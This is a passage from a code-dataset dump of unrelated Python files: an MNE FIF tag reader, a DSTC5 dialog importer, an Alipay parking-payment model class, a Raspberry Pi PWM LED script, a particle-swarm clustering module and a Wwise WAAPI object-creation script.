np.fromfile(fid, dtype='>i', count=ndim + 1)\n if ndim != 2:\n raise ValueError('Only two-dimensional matrices are '\n 'supported at this time')\n\n # Back to where the data start\n fid.seek(pos, 0)\n nnz = dims[0]\n nrow = dims[1]\n ncol = dims[2]\n sparse_data = np.fromfile(fid, dtype='>f4', count=nnz)\n shape = (dims[1], dims[2])\n if matrix_coding == matrix_coding_CCS:\n # CCS\n sparse.csc_matrix()\n sparse_indices = np.fromfile(fid, dtype='>i4', count=nnz)\n sparse_ptrs = np.fromfile(fid, dtype='>i4', count=ncol + 1)\n tag.data = sparse.csc_matrix((sparse_data, sparse_indices,\n sparse_ptrs), shape=shape)\n else:\n # RCS\n 
sparse_indices = np.fromfile(fid, dtype='>i4', count=nnz)\n sparse_ptrs = np.fromfile(fid, dtype='>i4', count=nrow + 1)\n tag.data = sparse.csr_matrix((sparse_data, sparse_indices,\n sparse_ptrs), shape=shape)\n else:\n raise ValueError('Cannot handle other than dense or sparse '\n 'matrices yet')\n else:\n # All other data types\n\n # Simple types\n if tag.type == FIFF.FIFFT_BYTE:\n tag.data = np.fromfile(fid, dtype=\">B1\", count=tag.size)\n elif tag.type == FIFF.FIFFT_SHORT:\n tag.data = np.fromfile(fid, dtype=\">h2\", count=tag.size / 2)\n elif tag.type == FIFF.FIFFT_INT:\n tag.data = np.fromfile(fid, dtype=\">i4\", count=tag.size / 4)\n elif tag.type == FIFF.FIFFT_USHORT:\n tag.data = np.fromfile(fid, dtype=\">H2\", count=tag.size / 2)\n elif tag.type == FIFF.FIFFT_UINT:\n tag.data = np.fromfile(fid, dtype=\">I4\", count=tag.size / 4)\n elif tag.type == FIFF.FIFFT_FLOAT:\n tag.data = np.fromfile(fid, dtype=\">f4\", count=tag.size / 4)\n elif tag.type == FIFF.FIFFT_DOUBLE:\n tag.data = np.fromfile(fid, dtype=\">f8\", count=tag.size / 8)\n elif tag.type == FIFF.FIFFT_STRING:\n tag.data = np.fromfile(fid, dtype=\">c\", count=tag.size)\n tag.data = ''.join(tag.data)\n elif tag.type == FIFF.FIFFT_DAU_PACK16:\n tag.data = np.fromfile(fid, dtype=\">h2\", count=tag.size / 2)\n elif tag.type == FIFF.FIFFT_COMPLEX_FLOAT:\n tag.data = np.fromfile(fid, dtype=\">f4\", count=tag.size / 4)\n tag.data = tag.data[::2] + 1j * tag.data[1::2]\n elif tag.type == FIFF.FIFFT_COMPLEX_DOUBLE:\n tag.data = np.fromfile(fid, dtype=\">f8\", count=tag.size / 8)\n tag.data = tag.data[::2] + 1j * tag.data[1::2]\n #\n # Structures\n #\n elif tag.type == FIFF.FIFFT_ID_STRUCT:\n tag.data = dict()\n tag.data['version'] = int(np.fromfile(fid, dtype=\">i4\",\n count=1))\n tag.data['version'] = int(np.fromfile(fid, dtype=\">i4\",\n count=1))\n tag.data['machid'] = np.fromfile(fid, dtype=\">i4\", count=2)\n tag.data['secs'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['usecs'] = 
int(np.fromfile(fid, dtype=\">i4\", count=1))\n elif tag.type == FIFF.FIFFT_DIG_POINT_STRUCT:\n tag.data = dict()\n tag.data['kind'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['ident'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['r'] = np.fromfile(fid, dtype=\">i4\", count=3)\n tag.data['coord_frame'] = 0\n elif tag.type == FIFF.FIFFT_COORD_TRANS_STRUCT:\n tag.data = Bunch()\n tag.data['from'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['to'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n rot = np.fromfile(fid, dtype=\">f4\", count=9).reshape(3, 3)\n move = np.fromfile(fid, dtype=\">f4\", count=3)\n tag.data['trans'] = np.r_[np.c_[rot, move],\n np.array([[0], [0], [0], [1]]).T]\n #\n # Skip over the inverse transformation\n # It is easier to just use inverse of trans in Matlab\n #\n fid.seek(12 * 4, 1)\n elif tag.type == FIFF.FIFFT_CH_INFO_STRUCT:\n d = Bunch()\n d['scanno'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n d['logno'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n d['kind'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n d['range'] = float(np.fromfile(fid, dtype=\">f4\", count=1))\n d['cal'] = float(np.fromfile(fid, dtype=\">f4\", count=1))\n d['coil_type'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n #\n # Read the coil coordinate system definition\n #\n d['loc'] = np.fromfile(fid, dtype=\">f4\", count=12)\n d['coil_trans'] = None\n d['eeg_loc'] = None\n d['coord_frame'] = FIFF.FIFFV_COORD_UNKNOWN\n tag.data = d\n #\n # Convert loc into a more useful format\n #\n loc = tag.data.loc\n kind = tag.data.kind\n if kind == FIFF.FIFFV_MEG_CH or kind == FIFF.FIFFV_REF_MEG_CH:\n tag.data.coil_trans = np.r_[np.c_[loc[3:5], loc[6:8],\n loc[9:11], loc[0:2]],\n np.array([0, 0, 0, 1]).reshape(1, 4)]\n tag.data.coord_frame = FIFF.FIFFV_COORD_DEVICE\n elif tag.data.kind == FIFF.FIFFV_EEG_CH:\n if np.linalg.norm(loc[3:5]) > 0:\n tag.data.eeg_loc = np.c_[loc[0:2], loc[3:5]]\n else:\n tag.data.eeg_loc = 
loc[1:3]\n tag.data.coord_frame = FIFF.FIFFV_COORD_HEAD\n #\n # Unit and exponent\n #\n tag.data['unit'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['unit_mul'] = int(np.fromfile(fid, dtype=\">i4\",\n count=1))\n #\n # Handle the channel name\n #\n ch_name = np.fromfile(fid, dtype=\">c\", count=16)\n #\n # Omit nulls\n #\n tag.data['ch_name'] = ''.join(\n ch_name[:np.where(ch_name == '')[0][0]])\n\n elif tag.type == FIFF.FIFFT_OLD_PACK:\n offset = float(np.fromfile(fid, dtype=\">f4\", count=1))\n scale = float(np.fromfile(fid, dtype=\">f4\", count=1))\n tag.data = np.fromfile(fid, dtype=\">h2\",\n count=(tag.size - 8) / 2)\n tag.data = scale * tag.data + offset\n elif tag.type == FIFF.FIFFT_DIR_ENTRY_STRUCT:\n tag.data = list()\n for _ in range(tag.size / 16 - 1):\n s = fid.read(4 * 4)\n tag.data.append(Tag(*struct.unpack(\">iIii\", s)))\n else:\n raise ValueError('Unimplemented tag data type %s' % tag.type)\n\n if tag.next != FIFF.FIFFV_NEXT_SEQ:\n # f.seek(tag.next,0)\n fid.seek(tag.next, 1) # XXX : fix? 
pb when tag.next < 0\n\n return tag\n\n\ndef find_tag(fid, node, findkind):\n \"\"\"Find Tag in an open FIF file descriptor\n \"\"\"\n for p in range(node.nent):\n if node.directory[p].kind == findkind:\n return read_tag(fid, node.directory[p].pos)\n tag = None\n return tag\n\n\ndef has_tag(node, kind):\n \"\"\"Does the node contains a Tag of a given kind?\n \"\"\"\n for d in node.directory:\n if d.kind == kind:\n return True\n return False\n","sub_path":"mne/fiff/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":13704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532575436","text":"import argparse\nimport os\nimport collections\n\nimport dstc_util\nfrom xtrack2_config import dstc45_ontology_filename\nfrom data_model import Dialog\n\nfrom dstc5_scripts import ontology_reader\n\nONTOLOGY = {}\n\n'''\ndef build_unified_ontology(in_ontology_reader):\n merged_ontology = collections.defaultdict(lambda: set([]))\n ontologies = in_ontology_reader.get_tagsets()\n for topic_name, topic_ontology in ontologies.iteritems():\n for slot, slot_values in topic_ontology.iteritems():\n merged_ontology[slot].update(slot_values)\n result = {\n slot_name: list(slot_values)\n for slot_name, slot_values in merged_ontology.iteritems()\n }\n return result\n'''\n\n\ndef build_ontology_for_topic(in_ontology_reader, in_topic):\n result_ontology = collections.defaultdict(lambda: set([]))\n for slot, slot_values in in_ontology_reader.tagsets[in_topic].items():\n result_ontology[slot].update(slot_values)\n result = {\n slot_name: list(slot_values)\n for slot_name, slot_values in result_ontology.iteritems()\n }\n return result\n\n\ndef _stringify_act(in_slots_map):\n res = []\n for slot in in_slots_map:\n res.append(slot['name'])\n for name, value in slot['attrs'].iteritems():\n res.append(name.replace(' ', '_'))\n res.append(value.replace(' ', '_'))\n if len(res) == 0:\n res = [\"sys\"]\n return \" \".join(res)\n\n\ndef 
import_dstc(data_dir, out_dir, flist, use_stringified_system_acts):\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n dialog_dirs = []\n with open(flist) as f_in:\n for f_name in f_in:\n name = f_name.strip()\n if not name:\n continue\n dialog_dirs.append(os.path.join(data_dir, name))\n\n for i, dialog_dir in enumerate(dialog_dirs):\n dialog = dstc_util.parse_dialog_from_directory(dialog_dir)\n\n out_dialog = Dialog(dialog_dir, dialog.session_id)\n for utterance in dialog.utterances:\n state = dict(utterance.dialog_state)\n if use_stringified_system_acts:\n msg = _stringify_act(utterance.slots_map)\n else:\n msg = utterance.transcript\n actor_id = Dialog.ACTORS_MAP[utterance.speaker]\n out_dialog.add_message(\n [(msg, 1.0)],\n state,\n actor_id,\n utterance.segment_topic,\n utterance.segment_bio\n )\n\n with open(os.path.join(out_dir, \"%d.json\" % (i,)), \"w\") as f_out:\n f_out.write(out_dialog.serialize())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"Import DSTC5 data to XTrack2.\"\n )\n parser.add_argument(\n '--data_dir',\n required=True,\n help=\"Root directory with logs.\"\n )\n parser.add_argument(\n '--flist',\n required=True,\n help=\"File list with logs.\"\n )\n parser.add_argument(\n '--out_dir',\n required=True,\n help=\"Output directory.\"\n )\n parser.add_argument(\n '--use_stringified_system_acts',\n action='store_true',\n default=False\n )\n args = parser.parse_args()\n ONTOLOGY = build_unified_ontology(\n ontology_reader.OntologyReader(dstc45_ontology_filename)\n )\n import_dstc(**vars(args))\n","sub_path":"import_dstc45.py","file_name":"import_dstc45.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297703467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\nfrom alipay.aop.api.domain.ParkingOrderPromo import 
ParkingOrderPromo\n\n\nclass AlipayEcoMycarParkingPayApplyModel(object):\n\n def __init__(self):\n self._in_time = None\n self._out_order_no = None\n self._out_serial_no = None\n self._out_time = None\n self._parking_id = None\n self._pay_scene = None\n self._plate_color = None\n self._plate_no = None\n self._promo = None\n self._seller_id = None\n self._serial_no = None\n self._subject = None\n self._total_amount = None\n\n @property\n def in_time(self):\n return self._in_time\n\n @in_time.setter\n def in_time(self, value):\n self._in_time = value\n @property\n def out_order_no(self):\n return self._out_order_no\n\n @out_order_no.setter\n def out_order_no(self, value):\n self._out_order_no = value\n @property\n def out_serial_no(self):\n return self._out_serial_no\n\n @out_serial_no.setter\n def out_serial_no(self, value):\n self._out_serial_no = value\n @property\n def out_time(self):\n return self._out_time\n\n @out_time.setter\n def out_time(self, value):\n self._out_time = value\n @property\n def parking_id(self):\n return self._parking_id\n\n @parking_id.setter\n def parking_id(self, value):\n self._parking_id = value\n @property\n def pay_scene(self):\n return self._pay_scene\n\n @pay_scene.setter\n def pay_scene(self, value):\n self._pay_scene = value\n @property\n def plate_color(self):\n return self._plate_color\n\n @plate_color.setter\n def plate_color(self, value):\n self._plate_color = value\n @property\n def plate_no(self):\n return self._plate_no\n\n @plate_no.setter\n def plate_no(self, value):\n self._plate_no = value\n @property\n def promo(self):\n return self._promo\n\n @promo.setter\n def promo(self, value):\n if isinstance(value, ParkingOrderPromo):\n self._promo = value\n else:\n self._promo = ParkingOrderPromo.from_alipay_dict(value)\n @property\n def seller_id(self):\n return self._seller_id\n\n @seller_id.setter\n def seller_id(self, value):\n self._seller_id = value\n @property\n def serial_no(self):\n return self._serial_no\n\n 
@serial_no.setter\n def serial_no(self, value):\n self._serial_no = value\n @property\n def subject(self):\n return self._subject\n\n @subject.setter\n def subject(self, value):\n self._subject = value\n @property\n def total_amount(self):\n return self._total_amount\n\n @total_amount.setter\n def total_amount(self, value):\n self._total_amount = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.in_time:\n if hasattr(self.in_time, 'to_alipay_dict'):\n params['in_time'] = self.in_time.to_alipay_dict()\n else:\n params['in_time'] = self.in_time\n if self.out_order_no:\n if hasattr(self.out_order_no, 'to_alipay_dict'):\n params['out_order_no'] = self.out_order_no.to_alipay_dict()\n else:\n params['out_order_no'] = self.out_order_no\n if self.out_serial_no:\n if hasattr(self.out_serial_no, 'to_alipay_dict'):\n params['out_serial_no'] = self.out_serial_no.to_alipay_dict()\n else:\n params['out_serial_no'] = self.out_serial_no\n if self.out_time:\n if hasattr(self.out_time, 'to_alipay_dict'):\n params['out_time'] = self.out_time.to_alipay_dict()\n else:\n params['out_time'] = self.out_time\n if self.parking_id:\n if hasattr(self.parking_id, 'to_alipay_dict'):\n params['parking_id'] = self.parking_id.to_alipay_dict()\n else:\n params['parking_id'] = self.parking_id\n if self.pay_scene:\n if hasattr(self.pay_scene, 'to_alipay_dict'):\n params['pay_scene'] = self.pay_scene.to_alipay_dict()\n else:\n params['pay_scene'] = self.pay_scene\n if self.plate_color:\n if hasattr(self.plate_color, 'to_alipay_dict'):\n params['plate_color'] = self.plate_color.to_alipay_dict()\n else:\n params['plate_color'] = self.plate_color\n if self.plate_no:\n if hasattr(self.plate_no, 'to_alipay_dict'):\n params['plate_no'] = self.plate_no.to_alipay_dict()\n else:\n params['plate_no'] = self.plate_no\n if self.promo:\n if hasattr(self.promo, 'to_alipay_dict'):\n params['promo'] = self.promo.to_alipay_dict()\n else:\n params['promo'] = self.promo\n if self.seller_id:\n if 
hasattr(self.seller_id, 'to_alipay_dict'):\n params['seller_id'] = self.seller_id.to_alipay_dict()\n else:\n params['seller_id'] = self.seller_id\n if self.serial_no:\n if hasattr(self.serial_no, 'to_alipay_dict'):\n params['serial_no'] = self.serial_no.to_alipay_dict()\n else:\n params['serial_no'] = self.serial_no\n if self.subject:\n if hasattr(self.subject, 'to_alipay_dict'):\n params['subject'] = self.subject.to_alipay_dict()\n else:\n params['subject'] = self.subject\n if self.total_amount:\n if hasattr(self.total_amount, 'to_alipay_dict'):\n params['total_amount'] = self.total_amount.to_alipay_dict()\n else:\n params['total_amount'] = self.total_amount\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayEcoMycarParkingPayApplyModel()\n if 'in_time' in d:\n o.in_time = d['in_time']\n if 'out_order_no' in d:\n o.out_order_no = d['out_order_no']\n if 'out_serial_no' in d:\n o.out_serial_no = d['out_serial_no']\n if 'out_time' in d:\n o.out_time = d['out_time']\n if 'parking_id' in d:\n o.parking_id = d['parking_id']\n if 'pay_scene' in d:\n o.pay_scene = d['pay_scene']\n if 'plate_color' in d:\n o.plate_color = d['plate_color']\n if 'plate_no' in d:\n o.plate_no = d['plate_no']\n if 'promo' in d:\n o.promo = d['promo']\n if 'seller_id' in d:\n o.seller_id = d['seller_id']\n if 'serial_no' in d:\n o.serial_no = d['serial_no']\n if 'subject' in d:\n o.subject = d['subject']\n if 'total_amount' in d:\n o.total_amount = d['total_amount']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayEcoMycarParkingPayApplyModel.py","file_name":"AlipayEcoMycarParkingPayApplyModel.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352458190","text":"# 更改亮燈頻率\nimport RPi.GPIO as GPIO\nimport time\n\npinLED = 21\nfreq = 0.5\ndc = 0.5\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pinLED,GPIO.OUT)\np = 
GPIO.PWM(pinLED,freq)\n\np.start(dc)\ninput('enter to stop')\np.ChangeFrequency(1)\np.ChangeDutyCycle(90)\ninput('enter to stop')\np.stop()\n\nGPIO.cleanup()\n","sub_path":"PWM_change_frequency.py","file_name":"PWM_change_frequency.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220723663","text":"import random\nimport math\nfrom k_means import K_MEANS\nimport sys\nsys.path.insert(0, '../')\nsys.path.insert(0, '../function_optimization/')\nimport vector_operations as vector\nfrom pso import PSO\n\nv1 = ( (3,6), (4,5), (4,7), (5,5), (5,6), (5,8) )\nv2 = ( (2,1), (2,-1), (3,2), (3,0), (4,1), (4,-1) ) \nv3 = ( (-1,3), (-2,2), (-2,4), (-3,3), (-4,2), (-4,4) )\ntest_vectors = v1 + v2 + v3\n\ndef mdist(v1, v2):\n\treturn -vector.distance(v1, v2)\n\nclass DCPSO:\n\t\n\tdef __init__(self, vectors = test_vectors, similarity = 'cosine', k_max = 10):\n\t\tself.vectors = vectors\n\t\tself.k_max = k_max\n\t\tself.len_vectors = len(self.vectors)\n\t\tif similarity == 'distance':\n\t\t\t#self.fitness_index = self.dcpso_i_index\n\t\t\tself.similarity_index = mdist\n\t\t\tself.e1 = 1000\n\t\tif similarity == 'cosine':\n\t\t\tself.similarity_index = vector.cosine\n\t\tself.iter_n = 0\n\t\tself.m = tuple( random.sample(self.vectors, k_max) )\n\t\t\n\tdef determine_cos(self, i):\n\t\tfor j in range(self.len_vectors):\n\t\t\tyield vector.cosine(self.vectors[i], self.vectors[j])\n\t\n\tdef run(self, n_new_iter = 20):\n\t\ttarget_n_iter = self.iter_n + n_new_iter\n\t\twhile self.iter_n < target_n_iter:\n\t\t\tself.run_iteration()\n\t\n\tdef run_iteration(self):\n\t\tself.iter_n += 1\n\t\tself.pso = PSO(self.random_swarm_particle, self.fitness_index, is_binary = True)\n\t\tself.pso.run(5)\n\t\tself.determine_clustering_info()\n\t\tself.m = self.adjusted_m()\n\t\tprint( self.iter_n )\n\t\n\tdef determine_clustering_info(self):\n\t\tmt = tuple( self.determine_mt() )\n\t\tself.k = 
len(mt)\n\t\t\n\t\tkm = K_MEANS(self.vectors, self.similarity_index, self.k)\n\t\tkm.set_centroids(mt)\n\t\tkm.run()\n\t\t\n\t\tself.centroids = km.centroids\n\t\tself.n_clusters = self.k\n\t\tself.labels = km.labels\n\t\tself.clusters = km.clusters\n\t\tself.clusters_x = km.clusters_x\n\t\tself.best_fitness = self.pso.gb\n\t\tself.fitness = self.best_fitness\n\t\t\n\tdef determine_mt(self):\n\t\tfor i in range(self.k_max):\n\t\t\tif self.pso.gb_x[i] == 1:\n\t\t\t\tyield self.m[i]\n\t\n\tdef adjusted_m(self):\n\t\treturn self.centroids + tuple( random.sample(self.vectors, self.k_max - self.k) )\n\t\t\t\t\n\tdef random_swarm_particle(self):\n\t\treturn tuple( 1 if random.random() < 0.5 else 0 for i in range(self.k_max) )\n\t\t\n\tdef cluster_disimilarity(self, c1, c2):\n\t\tif len(c1) * len(c2) == 0:\n\t\t\treturn 1\n\t\treturn max( self.cos[c1i][c2i] for c1i in c1 for c2i in c2 )\n\t\t\n\tdef similarity(self, x, y):\n\t\tres = vector.cosine(x, y)\n\t\treturn res + 1.00001\n\tdef cluster_similarity(self, c1, c2):\n\t\t\treturn max( self.similarity(e1, e2) + 2 for e1 in c1 for e2 in c2 )\t\t\n\t\n\tdef dcpso_index(self, x):\n\t\td = len(self.vectors[0])\n\t\tk = len(x)\n\t\tnre = [0 for i in range(k)]\n\t\tsums = [0 for i in range(k)]\n\t\tcenters = [vector.zero_v(d) for i in range(k)]\n\t\tv = [ [] for i in range(k)]\n\t\tfor i in range(len(self.vectors)):\n\t\t\tclosest_cluster = 0\n\t\t\td_min = self.similarity(self.vectors[i], x[0])\n\t\t\tfor j in range(k):\n\t\t\t\tcd = self.similarity(self.vectors[i], x[j])\n\t\t\t\tif cd > d_min:\n\t\t\t\t\td_min = cd\n\t\t\t\t\tclosest_cluster = j\n\t\t\tnre[closest_cluster] += 1\n\t\t\tsums[closest_cluster] += d_min\n\t\t\tv[closest_cluster].append(self.vectors[i])\n\t\t\tcenters[closest_cluster] = vector.add(centers[closest_cluster], self.vectors[i])\n\t\t\n\t\tfor i in range(k):\n\t\t\tif nre[i] == 0:\n\t\t\t\treturn -100000\n\t\t\n\t\treturn self.f_upgma(k, v, sums, nre)\n\t\n\tdef cosine(self, x1, x2):\n\t\treturn 
vector.cosine(x1, x2) + 1.0001\n\t\n\tdef f_upgma(self, k, v, sums, nre):\n\t\tintra = sum( sums[i] / nre[i] for i in range(k) ) / k\n\t\tinter = max( self.upgma(v[i], v[j])\n\t\t\t\t\t\t\t\t\tfor i in range(k)\n\t\t\t\t\t\t\t\t\t\tfor j in range(i + 1, k) )\n\t\treturn intra / inter\n\t\n\tdef upgma(self, c1, c2):\n\t\ts = sum( self.cosine(e1, e2) for e1 in c1 for e2 in c2 )\n\t\tnr_pairs = len(c1) * len(c2)\n\t\treturn s / nr_pairs\n\t\n\tdef f212(self, nre, sums, v, k, centers):\n\t\tintra = min( sums[i] / nre[i] for i in range(k) )\n\t\tinter = max( self.cluster_similarity(v[i], v[j]) \n\t\t\t\t\t\t\t\t\t\t\tfor i in range(k) for j in range(k)[i+1:] )\n\t\treturn inter / intra\n\t\n\tdef fitness_index(self, x):\n\t\tif sum(x) < 2:\n\t\t\treturn -1000000\n\t\treturn self.dcpso_index(tuple( self.m[i] for i in range(self.k_max) if x[i] == 1 ))\n\t\n\tdef dcpso_v_index(self, x):\n\t\tprint(x)\n\t\treturn 10\n\t\tif sum(x) < 2:\n\t\t\treturn 100000\n\t\treturn self.v_index( tuple( self.m[i] for i in range(self.k_max) if x[i] == 1 ) )\n\t\n\tdef v_index(self, x):\n\t\tx_k = len(x)\n\t\tkm = K_MEANS(self.vectors, self.similarity_index, x_k)\n\t\tkm.set_centroids(x)\n\t\tx_clusters = km.clusters_x\n\t\tek = 0\n\t\tfor j in range(x_k):\n\t\t\tfor vic in x_clusters[j]:\n\t\t\t\tek += vector.norm(vector.add( x[j], vector.sm(-1, vic) )) ** 2\n\t\tdk = min( vector.norm(vector.add(x[j], vector.sm(-1, x[i]))) ** 2\n\t\t\tfor i in range(x_k)\n\t\t\t\tfor j in range(x_k)[i+1:] )\n\t\treturn ek / dk\n\t\n\tdef intra(self, x):\n\t\tk = len(x)\n\t\td = len(self.vectors[0])\n\t\tnre = [0 for i in range(k)]\n\t\tsums = [0 for i in range(k)]\n\t\tfor i in range(len(self.vectors)):\n\t\t\tclosest_cluster = 0\n\t\t\td_min = self.similarity_index(self.vectors[i], x[0])\n\t\t\tfor j in range(k):\n\t\t\t\tcd = self.similarity_index(self.vectors[i], x[j])\n\t\t\t\tif cd > d_min:\n\t\t\t\t\td_min = cd\n\t\t\t\t\tclosest_cluster = j\n\t\t\tnre[closest_cluster] += 
1\n\t\t\tsums[closest_cluster] += d_min\n\t\tfor i in range(k):\n\t\t\tif nre[i] == 0:\n\t\t\t\treturn 0.000001\n\t\tsums = [sums[i] / nre[i] for i in range(k)]\n\t\tsuma = sum(sums)\n\t\treturn suma\n\t\n\tdef tonio_index(self, x):\n\t\tx_k = len(x)\n\t\t\n\t\tinter = sum( vector.cosine(x[i], x[j]) for i in range(x_k) for j in range(x_k)[i+1:] ) / ((x_k*(x_k-1))/2)\n\t\t#inter = max( self.cluster_disimilarity(km.clusters[i], km.clusters[j]) for i in range(x_k) for j in range(x_k)[i+1:] ) \n\t\t\n\t\treturn inter / self.intra(x)\n\t\n\tdef dcpso_i_index(self, x):\n\t\tif sum(x) < 2:\n\t\t\treturn 100000\n\t\treturn self.i_index( tuple( self.m[i] for i in range(self.k_max) if x[i] == 1 ) )\n\t\n\tdef i_index(self, x):\n\t\tx_k = len(x)\n\t\tkm = K_MEANS(self.vectors, self.similarity_index, x_k)\n\t\tkm.set_centroids(x)\n\t\tx_clusters = km.clusters_x\n\t\tek = 0\n\t\tfor j in range(x_k):\n\t\t\tfor vic in x_clusters[j]:\n\t\t\t\tek += vector.norm(vector.add( x[j], vector.sm(-1, vic) ))\n\t\tdk = max( vector.norm(vector.add(x[j], vector.sm(-1, x[i])))\n\t\t\tfor i in range(x_k)\n\t\t\t\tfor j in range(x_k)[i+1:] )\n\t\treturn -( self.e1 * dk ) / ( x_k * ek )\n\n","sub_path":"toolbox/clustering/dcpso.py","file_name":"dcpso.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25790094","text":"import os\nimport sys\n\nimport asyncio\n\nsys.path.append('..')\n\nfrom autobahn.asyncio.wamp import ApplicationRunner\nfrom ak_autobahn import AkComponent\n\nimport fnmatch\n\nfrom waapi_SG import WAAPI_URI\n\nimport tkinter\nfrom tkinter import filedialog\n\n\nclass MyComponent(AkComponent):\n\n# this script allows creation of Wwise objects and events\n# Selecting a parent object in wwise triggers a callback that\n# creates the desired object type underneath the selected parent\n# Optionally, it is possible to create an event at the same time\n# that Plays the recently created 
object....\n\n\n#store a ref to the selected parent object\n parentObject = None\n\n#flow control\n parentSelected = False\n objectCreated = False\n eventCreated = False\n\n#dic to store return/results from yield calls\n Results = {}\n\n#Variables for object creation\n objParID = \"None\"\n objType = \"\"\n objName = \"\"\n nameConflict = \"merge\"\n objNotes = \"This object was auto created....\"\n\n#args dict for object creation For use with create object call\n createObjArgs = {}\n\n#variables for event creation\n eventName = \"\"\n eventTarget = \"\"\n evActionType = 1\n\n#args dict for event creation\n createEventArgs = {}\n\n#args for audio import\n INPUT_audioFilePath = \"~/Projects/Wwise/WAAPI/AudioFiles\"\n INPUT_audioFileList = []\n INPUT_originalsPath = \"WAAPI/TestImports\"\n\n importArgs = {}\n\n#Input variables. TO DO: Drive these from data e.g Reaper\n INPUT_ObjectType = \"BlendContainer\"\n INPUT_ObjectName = \"MyCreatedObject\"\n OPTION_CreateEvent = True\n\n\n\n\n def printThis(self,msg):\n print(msg)\n\n def onJoin(self, details):\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_getinfo) # RPC call without arguments\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n else:\n # Call was successful, displaying information from the payload.\n print(\"Hello {} {}\".format(res.kwresults['displayName'], res.kwresults['version']['displayName']))\n\n MyComponent.printThis(self,\"Test\")\n\n\n def askUserForImportDirectory():\n root = tkinter.Tk()\n root.withdraw()\n root.update()\n MyComponent.INPUT_audioFilePath = filedialog.askdirectory(title=\"Choose source directory\")\n root.update()\n root.destroy()\n print(MyComponent.INPUT_audioFilePath)\n\n\n def setupSubscriptions():\n # Subscribe to ak.wwise.core.object.created\n # Calls on_object_created whenever the event is received\n self.subscribe(onParentSelected, WAAPI_URI.ak_wwise_ui_selectionchanged)\n\n objCreateSubArgs = {\n \"options\": {\n \"return\": [\"type\", \"name\", 
\"category\", \"id\", \"path\"]\n }\n }\n self.subscribe(onObjectCreated, WAAPI_URI.ak_wwise_core_object_created, **objCreateSubArgs)\n\n def ResetGates():\n MyComponent.parentSelected = False\n MyComponent.objectCreated = False\n MyComponent.eventCreated = False\n\n def onSelectionChanged(objects):\n print(\"Selection changed\")\n\n def onParentSelected(objects):\n # subscribe to selection change?\n if not MyComponent.parentSelected:\n print(\"Method to get the parent to create new object under\")\n success = False\n parID = None\n MyComponent.parentObject = objects[0]\n #getSelectedObject()\n print(\"Selected object is...\")\n\n if MyComponent.parentObject != None:\n success = True\n print(\"Selected object name is...{}\".format(MyComponent.parentObject[u\"name\"]))\n parID = str(MyComponent.parentObject[\"id\"])\n MyComponent.parentSelected = True\n\n if success:\n setupCreateArgs(parID, MyComponent.INPUT_ObjectType, MyComponent.INPUT_ObjectName) # include optional arguments for type/name/conflict\n yield from createWwiseObject(MyComponent.createObjArgs)\n print(MyComponent.Results)\n MyComponent.objectCreated = True\n else:\n print(\"Something went wrong!!\")\n return\n\n #import audio\n setupAudioFilePath()\n importParent = MyComponent.Results.kwresults['id']\n setupImportArgs(importParent, MyComponent.INPUT_audioFileList,MyComponent.INPUT_originalsPath)\n yield from importAudioFiles(MyComponent.importArgs)\n\n #Setup an event to play the created object\n if MyComponent.OPTION_CreateEvent:\n evName = MyComponent.Results.kwresults[\"name\"]\n evTarget = str(MyComponent.Results.kwresults[\"id\"])\n setupEventArgs(evName, evTarget)\n yield from createWwiseObject(MyComponent.createEventArgs)\n print(MyComponent.Results)\n MyComponent.eventCreated = True\n\n saveWwiseProject()\n\n self.leave()\n\n def saveWwiseProject():\n yield from self.call(WAAPI_URI.ak_wwise_core_project_save)\n\n def setupEventArgs(oname,otarget,oactionType = 1):\n print(\"setting up 
event\")\n\n MyComponent.eventName = oname\n MyComponent.eventTarget = otarget\n MyComponent.evActionType = oactionType\n\n MyComponent.createEventArgs = {\n\n \"parent\": \"\\\\Events\\\\Default Work Unit\",\n \"type\": \"Folder\",\n \"name\": \"WAAPI Auto Events\",\n \"onNameConflict\": \"merge\",\n \"children\": [\n {\n \"type\": \"Event\",\n \"name\": \"Play_\" + MyComponent.eventName,\n \"children\": [\n {\n \"name\": \"\",\n \"type\": \"Action\",\n \"@ActionType\": MyComponent.evActionType,\n \"@Target\": MyComponent.eventTarget\n }\n ]\n }\n ]\n }\n\n def setupCreateArgs(parentID ,otype = \"BlendContainer\", oname = \"AutoCreatedObject\", conflict = \"merge\"):\n #check the inputs\n if otype == \"\":\n MyComponent.objType = \"BlendContainer\"\n print(\"Defaulting type to Blend Container\")\n else:\n MyComponent.objType = otype\n if oname == \"\":\n MyComponent.objName = \"AutoCreatedObject\"\n print(\"Defaulting name to AutoCreatedObject\")\n else:\n MyComponent.objName = oname\n\n\n MyComponent.objParID = parentID\n MyComponent.nameConflict = conflict\n\n 